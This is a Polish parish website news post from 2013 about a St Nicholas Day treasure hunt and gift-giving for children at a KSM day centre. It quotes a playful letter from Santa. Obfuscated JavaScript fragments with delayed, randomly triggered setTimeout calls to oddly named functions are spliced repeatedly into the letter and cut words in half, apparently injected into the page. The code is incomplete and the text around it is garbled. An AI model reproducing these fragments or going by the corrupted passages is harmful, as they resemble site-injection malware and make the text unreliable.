wstazka
Kościół Świętego Ducha
Strona główna -> Aktualności z Centrum
Wpisał:adminicdmstracja Data: 10-12-2013
ikona

Mikołajki na świetlicy- w poszukiwaniu zagubionego Świętego Mikołaja

W piątek 6 grudnia biuro KSM przyjęło kopertę z dziwnymi stemplami i zagranicznymi oznaczeniami, która zaadresowana była do dzieciaków z naszej Świetlicy. W środku znajdował się list o takiej treści:

Moje drogie Dzieciaki ze Świetlicy KSM!andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

W tym roku postanowiłem w końcu napisać do was list. 6 grudnia jak wiecie andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to szczególny dzień w roku. Każdy z was zapewne czeka na moje przybycie i prezenty, które przygoandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towałem z myślą o waszych marzeniach…

Może was zaskoczę moi kochani, ale w tym roku andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to nie będzie wcale tak proste, żeby się ze mną spotkać. Widziałem czy byliście grzeczni i  czy staraliście się być dla innych życzliwi i pomocni . Postanowiłem,  że andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to wy musicie mnie znaleźć i wykonać trochę zadań po drodze aby spotkać się ze mną i dostać wspomniane prezenty.

Wasz Święty Mikołaj

Okazało się, że niestety aby spotkać się z tym wyjątkowym świętym musimy wyruszyć na poszukiwania. Do koperty dołączona była mapa ze wskazówkami dotarcia na miejsce spotkania. Pomimo śniegu i zimnego wiatru, który próbował zrywać nam czapki z głów ruszyliśmy w drogę. Na trasie spotykaliśmy jego wysłanników, którzy w zamian za odpowiedzi na mikołajowe zagadki wręczali nam kolejne części mapy. Nasze mikołajkowe poszukiwania zakończyły się salkach duszpasterstwa akademickiego KUL. Tam w Sali D ukrytej gdzieś w podziemiach uczelni, czekał na nas Mikołaj i jego śnieżynki oraz worki pełne prezentów. Zanim jednak święty rozdał nam nasze upragnione upominki wraz z wychowawcami i wolontariuszami wspólnie bawiliśmy się tak aby trochę ogrzać się po trudnych podchodach.

Zwieńczeniem całego spotkania było otrzymanie z rąk samego świętego wymarzonych prezentów. Wszystkie nasze najskrytsze pragnienia, o których pisaliśmy w listach spełniły się! W paczkach były rzeczy o które prosiliśmy- czapki, książki, perfumy, misie, gry, słuchawki, lalki, piłki. Bezcenne miny dzieciaków i słowa, które wykrzykiwały przy otwieraniu kolejnych prezentów świadczyły tylko o wielkiej radości ze spełnionych marzeń.

Dziękujemy wszystkim pomocnikom Świętego Mikołaja, którzy włączyli się w Akcję Mikołajkową! Dzięki wam mogliśmy przeżyć jeden z piękniejszych dni z naszą świetlicową rodzinką podopiecznych, wychowawców i przyjaciół.

 

Podziel się na:

Komentarze
Przejdź do:
aktualności dla ducha video